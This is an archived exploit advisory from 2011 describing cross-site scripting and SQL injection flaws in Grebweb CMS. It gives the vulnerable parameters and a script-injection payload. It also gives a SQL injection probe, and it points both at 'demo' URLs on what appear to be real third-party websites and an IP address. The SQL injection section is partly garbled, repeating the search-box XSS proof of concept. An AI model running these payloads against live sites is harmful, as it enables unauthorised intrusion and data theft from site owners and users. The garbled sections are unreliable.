Grebweb CMS Cross Site Scripting / SQL Injection

Grebweb CMS Cross Site Scripting / SQL Injection: Posted Dec 31, 2011; Authored by Net.Edit0r, BHG Security Center; Grebweb CMS suffers from cross site scripting and remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | d4fef447ef9510de26841d4515804cb1793df278557de726f444ed6f8b88fc9b; Download | Favorite | View

Grebweb CMS Cross Site Scripting / SQL Injection

__________.__                 __               ___ ___
\______   \  | _____    ____ |  | __          /   |   \  ____
 |    |  _/  | \__  \ _/ ___\|  |/ /  ______ /    ~    \/ ___\
 |    |   \  |__/ __ \\  \___|    <  /_____/ \    Y    / /_/  >
 |______  /____(____  /\___  >__|_ \          \___|_  /\___  /
        \/          \/     \/     \/                \//_____/
                                                               .ORG
----------------------------------------------------------------
Grebweb Cms <= Multiple Disclosure Vulnerabilities
----------------------------------------------------------------

# Exploit Title: Grebweb Cms <= Multiple Disclosure Vulnerabilities
# Application Name: [Grebweb Cms]
# Date: 30/12/2011
# Author: BHG Security Center
# Home: Http://black-hg.org
# Software Link: [ http://www.grebweb.com/ ]
# Impact : [ High ]
# Tested on: [linux+apache]
# CVE : Webapps
# Finder(s):
    - Net.Edit0r (Net.edit0r [at] att [dot] net)

# Description: : Given the vulnerability you want to read files on the
server must have access

+-----------------------+
| Cross Site scripting  |
+-----------------------+

The vulnerable code is located in /admin/index.php?err=[XSS]


Proof of Concept:
-----------------


~ PoC : http://localhost/admin/index.php?err=[XSS]

  ~ Demo : http://202.71.128.172/NIHFW/admin/index.php?err="><script>alert(0)</script>

~ PoC 2

 Enter In Search Box XSS Code ~

 <FORM NAME="searchzoom" ACTION="index.php" TARGET=_top METHOD="post">

~ PoC : http://localhost/index.php

 ~ Demo : http://www.yagyashree.com/index.php


+-------------------+
| Sql Injection     |
+-------------------+

~ Poc 2

 Enter In Search Box XSS Code ~

 <FORM NAME="searchzoom" ACTION="index.php" TARGET=_top METHOD="post">

~ PoC : http://localhost/index.php

~ PoC : http://localhost/NIHFW/view-state.php?id=[Sqli]

  ~ Demo : http://202.71.128.172/NIHFW/view-state.php?id='


[-] Disclosure timeline:

[21/12/2011] - Vulnerabilities discovered
[24/12/2011] - Others vulnerabilities discovered
[27/12/2011] - Issues reported to http://black-hg.org
[30/12/2011] - Public disclosure


# Greets To :

Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ tHe.k!ll3r ~ Mr.XHat ~ Bl4ck.Viper

b3hz4d ~ G3n3Rall ~ NoL1m1t ~ __SENATOR__ ~ NetQurd ~ Cyber C0der

THANKS TO ALL Iranian HackerZ  ./Persian Gulf

===========================================[End]=============================================

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Grebweb CMS Cross Site Scripting / SQL Injection

Grebweb CMS Cross Site Scripting / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Grebweb CMS Cross Site Scripting / SQL Injection

Share This

Grebweb CMS Cross Site Scripting / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems